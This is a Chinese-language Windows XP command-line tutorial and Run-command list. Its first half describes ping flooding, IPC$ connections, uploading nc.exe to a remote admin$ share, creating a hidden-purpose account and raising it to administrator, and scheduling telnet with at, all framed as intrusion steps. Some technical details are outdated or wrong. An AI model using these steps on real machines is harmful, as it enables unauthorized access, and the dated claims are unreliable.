windows XP cmd命令大全

一，ping 　　

　　它是用來(lái)檢查網(wǎng)絡(luò)是否通暢或者網(wǎng)絡(luò)連接速度的命令。作為一個(gè)生活在網(wǎng)絡(luò)上的管理員或者黑客來(lái)說(shuō)，ping命令是第一個(gè)必須掌握的DOS命令，它所利用的原理是這樣的：網(wǎng)絡(luò)上的機(jī)器都有唯一確定的IP地址，我們給目標(biāo)IP地址發(fā)送一個(gè)數(shù)據(jù)包，對(duì)方就要返回一個(gè)同樣大小的數(shù)據(jù)包，根據(jù)返回的數(shù)據(jù)包我們可以確定目標(biāo)主機(jī)的存在，可以初步判斷目標(biāo)主機(jī)的操作系統(tǒng)等。下面就來(lái)看看它的一些常用的操作。先看看幫助吧，在DOS窗口中鍵入：ping /? 回車，。所示的幫助畫面。在此，我們只掌握一些基本的很有用的參數(shù)就可以了（下同）。 　　

　　-t 表示將不間斷向目標(biāo)IP發(fā)送數(shù)據(jù)包，直到我們強(qiáng)迫其停止。試想，如果你使用100M的寬帶接入，而目標(biāo)IP是56K的小貓，那么要不了多久，目標(biāo)IP就因?yàn)槌惺懿涣诉@么多的數(shù)據(jù)而掉線，呵呵，一次攻擊就這么簡(jiǎn)單的實(shí)現(xiàn)了。 　　

　　-l 定義發(fā)送數(shù)據(jù)包的大小，默認(rèn)為32字節(jié)，我們利用它可以最大定義到65500字節(jié)。結(jié)合上面介紹的-t參數(shù)一起使用，會(huì)有更好的效果哦。 　　

　　-n 定義向目標(biāo)IP發(fā)送數(shù)據(jù)包的次數(shù)，默認(rèn)為3次。如果網(wǎng)絡(luò)速度比較慢，3次對(duì)我們來(lái)說(shuō)也浪費(fèi)了不少時(shí)間，因?yàn)楝F(xiàn)在我們的目的僅僅是判斷目標(biāo)IP是否存在，那么就定義為一次吧。 　　

　　說(shuō)明一下，如果-t 參數(shù)和 -n參數(shù)一起使用，ping命令就以放在后面的參數(shù)為標(biāo)準(zhǔn)，比如"ping IP -t -n 3"，雖然使用了-t參數(shù)，但并不是一直ping下去，而是只ping 3次。另外，ping命令不一定非得ping IP，也可以直接ping主機(jī)域名，這樣就可以得到主機(jī)的IP。 　　

　　下面我們舉個(gè)例子來(lái)說(shuō)明一下具體用法。 　　

　　這里time=2表示從發(fā)出數(shù)據(jù)包到接受到返回?cái)?shù)據(jù)包所用的時(shí)間是2秒，從這里可以判斷網(wǎng)絡(luò)連接速度的大小 。從TTL的返回值可以初步判斷被ping主機(jī)的操作系統(tǒng)，之所以說(shuō)"初步判斷"是因?yàn)檫@個(gè)值是可以修改的。這里TTL=32表示操作系統(tǒng)可能是win98。

　　（小知識(shí)：如果TTL=128，則表示目標(biāo)主機(jī)可能是Win2000；如果TTL=250，則目標(biāo)主機(jī)可能是Unix）

　　至于利用ping命令可以快速查找局域網(wǎng)故障，可以快速搜索最快的QQ服務(wù)器，可以對(duì)別人進(jìn)行ping攻擊……這些就靠大家自己發(fā)揮了。 　　

二，nbtstat 　　

　　該命令使用TCP/IP上的NetBIOS顯示協(xié)議統(tǒng)計(jì)和當(dāng)前TCP/IP連接，使用這個(gè)命令你可以得到遠(yuǎn)程主機(jī)的NETBIOS信息，比如用戶名、所屬的工作組、網(wǎng)卡的MAC地址等。在此我們就有必要了解幾個(gè)基本的參數(shù)。 　　

　　-a 使用這個(gè)參數(shù)，只要你知道了遠(yuǎn)程主機(jī)的機(jī)器名稱，就可以得到它的NETBIOS信息（下同）。 　　

　　-A 這個(gè)參數(shù)也可以得到遠(yuǎn)程主機(jī)的NETBIOS信息，但需要你知道它的IP。

　　-n 列出本地機(jī)器的NETBIOS信息。 　　

　　當(dāng)?shù)玫搅藢?duì)方的IP或者機(jī)器名的時(shí)候，就可以使用nbtstat命令來(lái)進(jìn)一步得到對(duì)方的信息了，這又增加了我們?nèi)肭值谋ｋU(xiǎn)系數(shù)。 　　

三，netstat

　　這是一個(gè)用來(lái)查看網(wǎng)絡(luò)狀態(tài)的命令，操作簡(jiǎn)便功能強(qiáng)大。 　　

　　-a 查看本地機(jī)器的所有開(kāi)放端口，可以有效發(fā)現(xiàn)和預(yù)防木馬，可以知道機(jī)器所開(kāi)的服務(wù)等信息，如圖4。 　　

　　這里可以看出本地機(jī)器開(kāi)放有FTP服務(wù)、Telnet服務(wù)、郵件服務(wù)、WEB服務(wù)等。用法：netstat -a IP。

　　-r 列出當(dāng)前的路由信息，告訴我們本地機(jī)器的網(wǎng)關(guān)、子網(wǎng)掩碼等信息。用法：netstat -r IP。
四，tracert

　　跟蹤路由信息，使用此命令可以查出數(shù)據(jù)從本地機(jī)器傳輸?shù)侥繕?biāo)主機(jī)所經(jīng)過(guò)的所有途徑，這對(duì)我們了解網(wǎng)絡(luò)布局和結(jié)構(gòu)很有幫助。如圖5。 　　

　　這里說(shuō)明數(shù)據(jù)從本地機(jī)器傳輸?shù)?92.168.0.1的機(jī)器上，中間沒(méi)有經(jīng)過(guò)任何中轉(zhuǎn)，說(shuō)明這兩臺(tái)機(jī)器是在同一段局域網(wǎng)內(nèi)。用法：tracert IP。 　　

五，net 　　

　　這個(gè)命令是網(wǎng)絡(luò)命令中最重要的一個(gè)，必須透徹掌握它的每一個(gè)子命令的用法，因?yàn)樗墓δ軐?shí)在是太強(qiáng)大了，這簡(jiǎn)直就是 微軟為我們提供的最好的入侵工具。首先讓我們來(lái)看一看它都有那些子命令，鍵入net /?回車如圖6。

　　在這里，我們重點(diǎn)掌握幾個(gè)入侵常用的子命令。 　　

　　net view 　　

　　使用此命令查看遠(yuǎn)程主機(jī)的所以共享資源。命令格式為net view IP?！　?

　　net use

　　把遠(yuǎn)程主機(jī)的某個(gè)共享資源影射為本地盤符，圖形界面方便使用，呵呵。命令格式為net use x: IPsharename。上面一個(gè)表示把192.168.0.5IP的共享名為magic的目錄影射為本地的Z盤。下面表示和192.168.0.7建立IPC$連接（net use IPIPC$ "password" /user:"name"）， 　　

　　建立了IPC$連接后，呵呵，就可以上傳文件了：copy nc.exe 192.168.0.7admin$，表示把本地目錄下的nc.exe傳到遠(yuǎn)程主機(jī)，結(jié)合后面要介紹到的其他DOS命令就可以實(shí)現(xiàn)入侵了。 　　

　　net start

　　使用它來(lái)啟動(dòng)遠(yuǎn)程主機(jī)上的服務(wù)。當(dāng)你和遠(yuǎn)程主機(jī)建立連接后，如果發(fā)現(xiàn)它的什么服務(wù)沒(méi)有啟動(dòng)，而你又想利用此服務(wù)怎么辦？就使用這個(gè)命令來(lái)啟動(dòng)吧。用法：net start servername，如圖9，成功啟動(dòng)了telnet服務(wù)。 　　

　　net stop

　　入侵后發(fā)現(xiàn)遠(yuǎn)程主機(jī)的某個(gè)服務(wù)礙手礙腳，怎么辦？利用這個(gè)命令停掉就ok了，用法和net start同。 　　

　　net user

　　查看和帳戶有關(guān)的情況，包括新建帳戶、刪除帳戶、查看特定帳戶、激活帳戶、帳戶禁用等。這對(duì)我們?nèi)肭质呛苡欣模钪匾?，它為我們克隆帳戶提供了前提。鍵入不帶參數(shù)的net user，可以查看所有用戶，包括已經(jīng)禁用的。下面分別講解。

　　1，net user abcd 1234 /add，新建一個(gè)用戶名為abcd，密碼為1234的帳戶，默認(rèn)為user組成員。

　　2，net user abcd /del，將用戶名為abcd的用戶刪除。

　　3，net user abcd /active:no，將用戶名為abcd的用戶禁用。

　　4，net user abcd /active:yes，激活用戶名為abcd的用戶。

　　5，net user abcd，查看用戶名為abcd的用戶的情況　　

　　net localgroup

　　查看所有和用戶組有關(guān)的信息和進(jìn)行相關(guān)操作。鍵入不帶參數(shù)的net localgroup即列出當(dāng)前所有的用戶組。在入侵過(guò)程中，我們一般利用它來(lái)把某個(gè)帳戶提升為administrator組帳戶，這樣我們利用這個(gè)帳戶就可以控制整個(gè)遠(yuǎn)程主機(jī)了。用法：net localgroup groupname username /add。 　　

　　現(xiàn)在我們把剛才新建的用戶abcd加到administrator組里去了，這時(shí)候abcd用戶已經(jīng)是超級(jí)管理員了，呵呵，你可以再使用net user abcd來(lái)查看他的狀態(tài)，和圖10進(jìn)行比較就可以看出來(lái)。但這樣太明顯了，網(wǎng)管一看用戶情況就能漏出破綻，所以這種方法只能對(duì)付菜鳥(niǎo)網(wǎng)管，但我們還得知道?，F(xiàn)在的手段都是利用其他工具和手段克隆一個(gè)讓網(wǎng)管看不出來(lái)的超級(jí)管理員，這是后話。有興趣的朋友可以參照《黑客防線》第30期上的《由淺入深解析隆帳戶》一文。 　　

　　net time

　　這個(gè)命令可以查看遠(yuǎn)程主機(jī)當(dāng)前的時(shí)間。如果你的目標(biāo)只是進(jìn)入到遠(yuǎn)程主機(jī)里面，那么也許就用不到這個(gè)命令了。但簡(jiǎn)單的入侵成功了，難道只是看看嗎？我們需要進(jìn)一步滲透。這就連遠(yuǎn)程主機(jī)當(dāng)前的時(shí)間都需要知道，因?yàn)槔脮r(shí)間和其他手段（后面會(huì)講到）可以實(shí)現(xiàn)某個(gè)命令和程序的定時(shí)啟動(dòng)，為我們進(jìn)一步入侵打好基礎(chǔ)。用法：net time IP。 　　

六，at

這個(gè)命令的作用是安排在特定日期或時(shí)間執(zhí)行某個(gè)特定的命令和程序（知道net time的重要了吧？）。當(dāng)我們知道了遠(yuǎn)程主機(jī)的當(dāng)前時(shí)間，就可以利用此命令讓其在以后的某個(gè)時(shí)間（比如2分鐘后）執(zhí)行某個(gè)程序和命令。用法：at time command computer。 　　

　　表示在6點(diǎn)55分時(shí)，讓名稱為a-01的計(jì)算機(jī)開(kāi)啟telnet服務(wù)（這里net start telnet即為開(kāi)啟telnet服務(wù)的命令）。 　　
七，ftp 　　

　　大家對(duì)這個(gè)命令應(yīng)該比較熟悉了吧？網(wǎng)絡(luò)上開(kāi)放的ftp的主機(jī)很多，其中很大一部分是匿名的，也就是說(shuō)任何人都可以登陸上去。現(xiàn)在如果你掃到了一臺(tái)開(kāi)放ftp服務(wù)的主機(jī)（一般都是開(kāi)了21端口的機(jī)器），如果你還不會(huì)使用ftp的命令怎么辦？下面就給出基本的ftp命令使用方法。

　　首先在命令行鍵入ftp回車，出現(xiàn)ftp的提示符，這時(shí)候可以鍵入"help"來(lái)查看幫助（任何DOS命令都可以使用此方法查看其幫助)。 　　

　　大家可能看到了，這么多命令該怎么用？其實(shí)也用不到那么多，掌握幾個(gè)基本的就夠了。 　　

　　首先是登陸過(guò)程，這就要用到open了，直接在ftp的提示符下輸入"open 主機(jī)IP ftp端口"回車即可，一般端口默認(rèn)都是21，可以不寫。接著就是輸入合法的用戶名和密碼進(jìn)行登陸了，這里以匿名ftp為例介紹。 　　

　　用戶名和密碼都是ftp，密碼是不顯示的。當(dāng)提示**** logged in時(shí)，就說(shuō)明登陸成功。這里因?yàn)槭悄涿顷懀杂脩麸@示為Anonymous。 　　

　　接下來(lái)就要介紹具體命令的使用方法了。 　　

　　dir 跟DOS命令一樣，用于查看服務(wù)器的文件，直接敲上dir回車，就可以看到此ftp服務(wù)器上的文件。

　　cd 進(jìn)入某個(gè)文件夾。

　　get 下載文件到本地機(jī)器。

　　put 上傳文件到遠(yuǎn)程服務(wù)器。這就要看遠(yuǎn)程ftp服務(wù)器是否給了你可寫的權(quán)限了，如果可以，呵呵，該怎么 利用就不多說(shuō)了，大家就自由發(fā)揮去吧。

　　delete 刪除遠(yuǎn)程ftp服務(wù)器上的文件。這也必須保證你有可寫的權(quán)限。

　　bye 退出當(dāng)前連接。

　　quit 同上。
　　

八，telnet

　　功能強(qiáng)大的遠(yuǎn)程登陸命令，幾乎所有的入侵者都喜歡用它，屢試不爽。為什么？它操作簡(jiǎn)單，如同使用自己的機(jī)器一樣，只要你熟悉DOS命令，在成功以administrator身份連接了遠(yuǎn)程機(jī)器后，就可以用它來(lái)干你想干的一切了。下面介紹一下使用方法，首先鍵入telnet回車，再鍵入help查看其幫助信息。 　　

　　然后在提示符下鍵入open IP回車，這時(shí)就出現(xiàn)了登陸窗口，讓你輸入合法的用戶名和密碼，這里輸入任何密碼都是不顯示的。 　　

　　當(dāng)輸入用戶名和密碼都正確后就成功建立了telnet連接，這時(shí)候你就在遠(yuǎn)程主機(jī)上具有了和此用戶一樣的權(quán)限，利用DOS命令就可以實(shí)現(xiàn)你想干的事情了。這里我使用的超級(jí)管理員權(quán)限登陸的?！　?

　　到這里為止，網(wǎng)絡(luò)DOS命令的介紹就告一段落了，這里介紹的目的只是給菜鳥(niǎo)網(wǎng)管一個(gè)印象，讓其知道熟悉和掌握網(wǎng)絡(luò)DOS命令的重要性。其實(shí)和網(wǎng)絡(luò)有關(guān)的DOS命令還遠(yuǎn)不止這些，這里只是拋磚引玉，希望能對(duì)廣大菜鳥(niǎo)網(wǎng)管有所幫助。學(xué)好DOS對(duì)當(dāng)好網(wǎng)管有很大的幫助，特別的熟練掌握了一些網(wǎng)絡(luò)的DOS命令。

　　另外大家應(yīng)該清楚，任何人要想進(jìn)入系統(tǒng)，必須得有一個(gè)合法的用戶名和密碼（輸入法漏洞差不多絕跡了吧），哪怕你拿到帳戶的只有一個(gè)很小的權(quán)限，你也可以利用它來(lái)達(dá)到最后的目的。所以堅(jiān)決消滅空口令，給自己的帳戶加上一個(gè)強(qiáng)壯的密碼，是最好的防御弱口令入侵的方法。

　　最后，由衷的說(shuō)一句，培養(yǎng)良好的安全意識(shí)才是最重要的。

=========================================
開(kāi)始→運(yùn)行→命令集錦
winver 檢查Windows版本
wmimgmt.msc 打開(kāi)Windows管理體系結(jié)構(gòu)(wmi)
wupdmgr Windows更新程序
wscript Windows腳本宿主設(shè)置
write 寫字板
winmsd 系統(tǒng)信息
wiaacmgr 掃描儀和照相機(jī)向?qū)?
winchat xp自帶局域網(wǎng)聊天
mem.exe 顯示內(nèi)存使用情況
msconfig.exe 系統(tǒng)配置實(shí)用程序
mplayer2 簡(jiǎn)易widnows media player
mspaint 畫圖板
mstsc 遠(yuǎn)程桌面連接
mplayer2 媒體播放機(jī)
magnify 放大鏡實(shí)用程序
mmc 打開(kāi)控制臺(tái)
mobsync 同步命令

dxdiag 檢查directx信息
drwtsn32 系統(tǒng)醫(yī)生
devmgmt.msc 設(shè)備管理器
dfrg.msc 磁盤碎片整理程序
diskmgmt.msc 磁盤管理實(shí)用程序
dcomcnfg 打開(kāi)系統(tǒng)組件服務(wù)
ddeshare 打開(kāi)dde共享設(shè)置
dvdplay dvd播放器

net stop messenger 停止信使服務(wù)
net start messenger 開(kāi)始信使服務(wù)
notepad 打開(kāi)記事本
nslookup 網(wǎng)絡(luò)管理的工具向?qū)?
ntbackup 系統(tǒng)備份和還原
narrator 屏幕“講述人”
ntmsmgr.msc 移動(dòng)存儲(chǔ)管理器
ntmsoprq.msc 移動(dòng)存儲(chǔ)管理員操作請(qǐng)求
netstat -an （tc）命令檢查接口

syncapp 創(chuàng)建一個(gè)公文包
sysedit 系統(tǒng)配置編輯器
sigverif 文件簽名驗(yàn)證程序
sndrec32 錄音機(jī)
shrpubw 創(chuàng)建共享文件夾
secpol.msc 本地安全策略
syskey 系統(tǒng)加密，一旦加密就不能解開(kāi)，保護(hù)Windows xp系統(tǒng)的雙重密碼
services.msc 本地服務(wù)設(shè)置
sndvol32 音量控制程序
sfc.exe 系統(tǒng)文件檢查器
sfc /scannow windows文件保護(hù) tsshutdn 60秒倒計(jì)時(shí)關(guān)機(jī)命令
tourstart xp簡(jiǎn)介（安裝完成后出現(xiàn)的漫游xp程序）
taskmgr 任務(wù)管理器

eventvwr 事件查看器
eudcedit 造字程序
explorer 打開(kāi)資源管理器

packager 對(duì)象包裝程序
perfmon.msc 計(jì)算機(jī)性能監(jiān)測(cè)程序
progman 程序管理器

regedit.exe 注冊(cè)表
rsop.msc 組策略結(jié)果集
regedt32 注冊(cè)表編輯器
rononce -p 15秒關(guān)機(jī)
regsvr32 /u *.dll 停止dll文件運(yùn)行
regsvr32 /u zipfldr.dll 取消zip支持

cmd.exe cmd命令提示符
chkdsk.exe chkdsk磁盤檢查
certmgr.msc 證書管理實(shí)用程序
calc 啟動(dòng)計(jì)算器
charmap 啟動(dòng)字符映射表
cliconfg sql server 客戶端網(wǎng)絡(luò)實(shí)用程序
clipbrd 剪貼板查看器
conf 啟動(dòng)netmeeting
compmgmt.msc 計(jì)算機(jī)管理
cleanmgr 垃圾整理
ciadv.msc 索引服務(wù)程序

osk 打開(kāi)屏幕鍵盤
odbcad32 odbc數(shù)據(jù)源管理器
oobe/msoobe /a 檢查xp是否激活
lusrmgr.msc 本機(jī)用戶和組
logoff 注銷命令

iexpress 木馬捆綁工具，系統(tǒng)自帶

nslookup ip地址偵測(cè)器

fsmgmt.msc 共享文件夾管理器

utilman 輔助工具管理器

gpedit.msc 組策略

以下為Windows操作系統(tǒng)的常用運(yùn)行命令,執(zhí)行這些命令,就能打開(kāi)系統(tǒng)對(duì)應(yīng)的相關(guān)實(shí)用程序,如果大家能基本利用,就能檢查并修復(fù)系統(tǒng)的最基本的故障,除注銷,關(guān)閉系統(tǒng)命令外,其它所有命令,大家不妨一試!!

運(yùn)行輸入CMD輸入 對(duì)應(yīng)的相關(guān)實(shí)用程序:
. 打開(kāi)C:＼Documents and Settings＼XXX(當(dāng)前登錄Windows XP的用戶名)
.. 打開(kāi)Windows XP所在的盤符下的Documents and Settings文件夾
... 打開(kāi)“我的電腦”選項(xiàng)。
accwiz.exe 輔助工具向?qū)?
actmovie.exe 直接顯示安裝工具
append.exe 允許程序打開(kāi)制定目錄中的數(shù)據(jù)
arp.exe 顯示和更改計(jì)算機(jī)的IP與硬件物理地址的對(duì)應(yīng)列表
at.exe 計(jì)劃運(yùn)行任務(wù)
atmadm.exe ATM調(diào)用管理器統(tǒng)計(jì)
attrib.exe 顯示和更改文件和文件夾屬性
autochk.exe 檢測(cè)修復(fù)文件系統(tǒng) (XP不可用)
autoconv.exe 在啟動(dòng)過(guò)程中自動(dòng)轉(zhuǎn)化系統(tǒng) (XP不可用)
autofmt.exe 在啟動(dòng)過(guò)程中格式化進(jìn)程 (XP不可用)
autolfn.exe 使用長(zhǎng)文件名格式 (XP不可用)
arp.exe 顯示和更改計(jì)算機(jī)的IP與硬件物理地址的對(duì)應(yīng)
calc.exe 計(jì)算器
Bootvrfy.exe 通報(bào)啟動(dòng)成功
cacls.exe 顯示和編輯ACL
cdplayer.exe CD播放器
change.exe 與終端服務(wù)器相關(guān)的查詢 (XP不可用)
charmap.exe 字符映射表
chglogon.exe 啟動(dòng)或停用會(huì)話記錄 (XP不可用)
chgport.exe 改變端口（終端服務(wù)） (XP不可用)
chgusr.exe 改變用戶（終端服務(wù)） (XP不可用)
chkdsk.exe 磁盤檢測(cè)程序
chkntfs.exe NTFS磁盤檢測(cè)程序
cidaemon.exe 組成Ci文檔服務(wù)
cipher.exe 在NTFS上顯示或改變加密的文件或目錄
cisvc.exe 打開(kāi)索引內(nèi)容
ckcnv.exe 變換Cookie
cleanmgr.exe 磁盤清理
cliconfg.exe SQL客戶網(wǎng)絡(luò)工具
clipbrd.exe 剪貼簿查看器
clipsrv.exe 運(yùn)行Clipboard服務(wù)
clspack.exe 建立系統(tǒng)文件列表清單
cluster.exe 顯示域的集群 (XP不可用)
cmd.exe 進(jìn)2000XP DOS
cmdl32.exe 自動(dòng)下載連接管理
cmmgr32.exe 連接管理器
cmmon32.exe 連接管理器監(jiān)視
cmstp.exe 連接管理器配置文件安裝程序
comclust.exe 集群
comp.exe 比較兩個(gè)文件和文件集的內(nèi)容
conf??啟動(dòng)netmeeting聊天工具
control userpasswords2 XP密碼管理.
compmgmt.msc 計(jì)算機(jī)管理
cprofile.exe 轉(zhuǎn)換顯示模式 (XP不可用)
開(kāi)始,運(yùn)行,輸入CMD輸入net config workstation計(jì)算機(jī)名 完整的計(jì)算機(jī)名用戶名
工作站處于活動(dòng)狀態(tài)（即網(wǎng)絡(luò)描述） 軟件版本（即軟件版本號(hào)） 工作站域 工作站域的 DNS 名稱
登錄域 COM 打開(kāi)時(shí)間超時(shí)（秒） COM 發(fā)送量（字節(jié)） COM 發(fā)送超時(shí) (msec)
CMD輸入net config workstation 更改可配置工作站服務(wù)設(shè)置。
CMD輸入net config server 可以顯示不能配置的下服務(wù)器計(jì)算機(jī)名 服務(wù)器注釋 服務(wù)器版本（即軟件版本號(hào)）
服務(wù)器處于活動(dòng)狀態(tài)（即網(wǎng)絡(luò)描述） 服務(wù)器處于隱藏狀態(tài)（即 /hidden 設(shè)置）
最大登錄用戶數(shù)（即可使用服務(wù)器共享資源的最大用戶數(shù)）
每個(gè)會(huì)話打開(kāi)文件的最大數(shù)（即用戶可在一個(gè)會(huì)話中打開(kāi)服務(wù)器文件的最大數(shù)）
空閑會(huì)話時(shí)間（最小值）
chkdsk.exe 磁盤檢查.
Chkdsk /r 2000命令控制臺(tái)中的Chkdsk /r命令檢查修復(fù)系統(tǒng)文件
cleanmgr 垃圾整理
Clipbrd 剪貼板查看器
C:boot.ini 打開(kāi)啟動(dòng)菜單
compact.exe 顯示或改變NTFS分區(qū)上文件的壓縮狀態(tài)
conime.exe IME控制臺(tái)
control.exe 控制面板
convert.exe NTFS 轉(zhuǎn)換文件系統(tǒng)到NTFS
convlog.exe 轉(zhuǎn)換IIS日志文件格式到NCSA格式
cprofile.exe 轉(zhuǎn)換顯示模式
cscript.exe 較本宿主版本
csrss.exe 客戶服務(wù)器Runtime進(jìn)程 (XP不可用)
csvde.exe 格式轉(zhuǎn)換程序 (XP不可用)
dcpromo 活動(dòng)目錄安裝(XP不可用)
drwtsn32 系統(tǒng)醫(yī)生
diskmgmt.msc 磁盤管理器(和PowerQuest PartitionMagic 8.0)
dvdplay DVD 播放器
devmgmt.msc 設(shè)備管理器(檢查電腦硬件,驅(qū)動(dòng))
dxdiag 檢查DirectX信息
dcomcnfg.exe DCOM配置屬性 (控制臺(tái)根目錄)
dcpromo.exe 安裝向?qū)?(XP不可用)
ddeshare.exe DDE共享
debug.exe 檢查DEBUG
dfrgfat.exe FAT分區(qū)磁盤碎片整理程序
dfrgntfs.exe NTFS分區(qū)磁盤碎片整理程序 (XP不可用)
dfs_cmd_.exe 配置DFS樹(shù) (XP不可用)
dfsinit.exe 分布式文件系統(tǒng)初始化(XP不可用)
dfssvc.exe 分布式文件系統(tǒng)服務(wù)器 (XP不可用)
diantz.exe 制作CAB文件
diskperf.exe 磁盤性能計(jì)數(shù)器
dmremote.exe 磁盤管理服務(wù)的一部分 (XP不可用)
doskey.exe 命令行創(chuàng)建宏
dosx.exe DOS擴(kuò)展
dplaysvr.exe 直接運(yùn)行幫助 (XP不可用)
drwatson.exe 華生醫(yī)生錯(cuò)誤檢測(cè)
drwtsn32.exe 華生醫(yī)生顯示和配置管理
dvdplay.exe DVD播放
dxdiag.exe Direct-X診斷工具
edlin.exe 命令行的文本編輯
esentutl.exe MS數(shù)據(jù)庫(kù)工具
eudcedit.exe 造字程序
eventvwr.exe 事件查看器
exe2bin.exe 轉(zhuǎn)換EXE文件到二進(jìn)制
expand.exe 解壓縮
extrac32.exe 解CAB工具
fsmgmt.msc 共享文件夾
fastopen.exe 快速訪問(wèn)在內(nèi)存中的硬盤文件
faxcover.exe 傳真封面編輯
faxqueue.exe 顯示傳真隊(duì)列
faxsend.exe 發(fā)送傳真向?qū)?
faxsvc.exe 啟動(dòng)傳真服務(wù)
fc.exe 比較兩個(gè)文件的不同
find.exe 查找文件中的文本行
findstr.exe 查找文件中的行
finger.exe 一個(gè)用戶并顯示出統(tǒng)計(jì)結(jié)果
fixmapi.exe 修復(fù)MAPI文件
flattemp.exe 允許或者禁用臨時(shí)文件目錄 (XP不可用)
fontview.exe 顯示字體文件中的字體
forcedos.exe 強(qiáng)制文件在DOS模式下運(yùn)行
ftp.exe FTP下載
gpedit.msc 組策略
gdi.exe 圖形界面驅(qū)動(dòng)
grpconv.exe 轉(zhuǎn)換程序管理員組
hostname.exe 顯示機(jī)器的Hostname
Internat 輸入法圖標(biāo)
iexpress 木馬捆綁工具，系統(tǒng)自帶
ieshwiz.exe 自定義文件夾向?qū)?
iexpress.exe iexpress安裝包
iisreset.exe 重啟IIS服務(wù)(未安裝IIS,不可用)
internat.exe 鍵盤語(yǔ)言指示器 (XP不可用)
ipconfig.exe 查看IP配置
ipsecmon.exe IP安全監(jiān)視器
ipxroute.exe IPX路由和源路由控制程序
irftp.exe 無(wú)線連接
ismserv.exe 安裝或者刪除Service Control Manager中的服務(wù)
jdbgmgr.exe Java4的調(diào)試器
jetconv.exe 轉(zhuǎn)換Jet Engine數(shù)據(jù)庫(kù) (XP不可用)
jetpack.exe 壓縮Jet數(shù)據(jù)庫(kù) (XP不可用)
jview.exe Java的命令行裝載者
label.exe 改變驅(qū)動(dòng)器的卷標(biāo)
lcwiz.exe 許可證向?qū)?(XP不可用)
ldifde.exe LDIF目錄交換命令行管理 (XP不可用)
licmgr.exe 終端服務(wù)許可協(xié)議管理 (XP不可用)
lights.exe 顯示連接狀況 (XP不可用)
llsmgr.exe Windows 2000 許可協(xié)議管理 (XP不可用)
llssrv.exe 啟動(dòng)許可協(xié)議服務(wù)器 (XP不可用)
locator.exe RPC Locator 遠(yuǎn)程定位
lodctr.exe 調(diào)用性能計(jì)數(shù)
logoff.exe 注銷當(dāng)前用戶
lpq.exe 顯示遠(yuǎn)端的LPD打印隊(duì)列的狀態(tài)，顯示被送到基于Unix的服務(wù)器的打印任務(wù)
lpr.exe 用于Unix客戶打印機(jī)將打印任務(wù)發(fā)送給連接了打印設(shè)備的NT的打印機(jī)服務(wù)器。
lsass.exe 運(yùn)行LSA和Server的DLL
lserver.exe 指定默認(rèn)Server新的DNS域 (XP不可用)
lusrmgr.msc 本地賬戶管理
mmc 控制臺(tái)
mplayer2 播放器
macfile.exe 管理MACFILES (XP不可用)
magnify.exe 放大鏡
makecab.exe 制作CAB文件
mem.exe 顯示內(nèi)存狀態(tài)
migpwd.exe 遷移密碼
mmc.exe 控制臺(tái)
mnmsrvc.exe 遠(yuǎn)程桌面共享
mobsync.exe 同步目錄管理器
mountvol.exe 創(chuàng)建、刪除或列出卷的裝入點(diǎn)。
mplay32.exe Media Player 媒體播放器
mpnotify.exe 通知應(yīng)用程序
mqbkup.exe 信息隊(duì)列備份和恢復(fù)工具
mqmig.exe MSMQ Migration Utility 信息隊(duì)列遷移工具
mrinfo.exe 使用SNMP多點(diǎn)傳送路由
mscdexnt.exe 安裝MSCD
msdtc.exe 動(dòng)態(tài)事務(wù)處理控制臺(tái)
msg.exe 發(fā)送消息到本地或遠(yuǎn)程客戶
mshta.exe HTML應(yīng)用程序主機(jī)
msiexec.exe 開(kāi)始Windows安裝程序
mspaint.exe 打開(kāi)畫圖板
mstask.exe 任務(wù)計(jì)劃表程序
mstinit.exe 任務(wù)計(jì)劃表安裝
Msconfig.exe 系統(tǒng)配置實(shí)用程序 (配置啟動(dòng)選項(xiàng),服務(wù)項(xiàng))
mem.exe 顯示內(nèi)存使用情況
mspaint 畫圖板
Net Stop Messenger 停止信使服務(wù)
Net Start Messenger 恢復(fù)信使服務(wù)
nslookup 網(wǎng)絡(luò)管理的工具
Nslookup IP 地址偵測(cè)器
ntbackup 系統(tǒng)備份和還原
nbtstat.exe 使用 NBT（TCP/IP 上的 NetBIOS）顯示協(xié)議統(tǒng)計(jì)和當(dāng)前 TCP/IP 連接。
nddeapir.exe NDDE API服務(wù)器端
netsh.exe 用于配置和監(jiān)控 Windows 2000 命令行腳本接口(XP不可用)
netstat.exe 顯示協(xié)議統(tǒng)計(jì)和當(dāng)前的 TCP/IP 網(wǎng)絡(luò)連接。
nlsfunc.exe 加載特定國(guó)家的信息。Windows 2000 和 MS-DOS 子系統(tǒng)不使用該命令接受該命令只是為了與 MS-DOS 文件兼容。
notepad.exe 打開(kāi)記事本
nslookup.exe 該診斷工具顯示來(lái)自域名系統(tǒng) (DNS) 名稱服務(wù)器的信息。
ntbackup.exe 備份和故障修復(fù)工具
ntfrs.exe NT文件復(fù)制服務(wù) (XP不可用)
ntvdm.exe 模擬16位Windows環(huán)境
nw16.exe NetWare轉(zhuǎn)向器
nwscript.exe 運(yùn)行Netware腳本
odbcad32.exe 32位ODBC數(shù)據(jù)源管理 (驅(qū)動(dòng)程序管理)
odbcconf.exe 命令行配置ODBC驅(qū)動(dòng)和數(shù)據(jù)源
packager.exe 對(duì)象包裝程序
pathping.exe 包含Ping和Tracert的程序
pentnt.exe 檢查Pentium的浮點(diǎn)錯(cuò)誤
perfmon.exe 系統(tǒng)性能監(jiān)視器
ping.exe 驗(yàn)證與遠(yuǎn)程計(jì)算機(jī)的連接
posix.exe 用于兼容Unix
print.exe 打印文本文件或顯示打印隊(duì)列的內(nèi)容。
progman.exe 程序管理器
psxss.exe Posix子系統(tǒng)應(yīng)用程序
qappsrv.exe 在網(wǎng)絡(luò)上顯示終端服務(wù)器可用的程序
qprocess.exe 在本地或遠(yuǎn)程顯示進(jìn)程的信息（需終端服務(wù)）
query.exe 查詢進(jìn)程和對(duì)話 (XP不可用)
quser.exe 顯示用戶登陸的信息（需終端服務(wù)）
qwinsta.exe 顯示終端服務(wù)的信息
rononce -p 15秒關(guān)機(jī)
rasAdmin 遠(yuǎn)程訪問(wèn)服務(wù).
regedit.exe 注冊(cè)表編輯器
rasadmin.exe 啟動(dòng)遠(yuǎn)程訪問(wèn)服務(wù) (XP不可用)
rasautou.exe 建立一個(gè)RAS連接
rasdial.exe 寬帶,撥號(hào)連接
ras.exe 運(yùn)行RAS連接 (XP不可用)
rcp.exe 計(jì)算機(jī)和運(yùn)行遠(yuǎn)程外殼端口監(jiān)控程序 rshd 的系統(tǒng)之間復(fù)制文件
rdpclip.exe 終端和本地復(fù)制和粘貼文件
recover.exe 從壞的或有缺陷的磁盤中恢復(fù)可讀取的信息。
redir.exe 運(yùn)行重定向服務(wù)
regedt32.exe 32位注冊(cè)服務(wù)
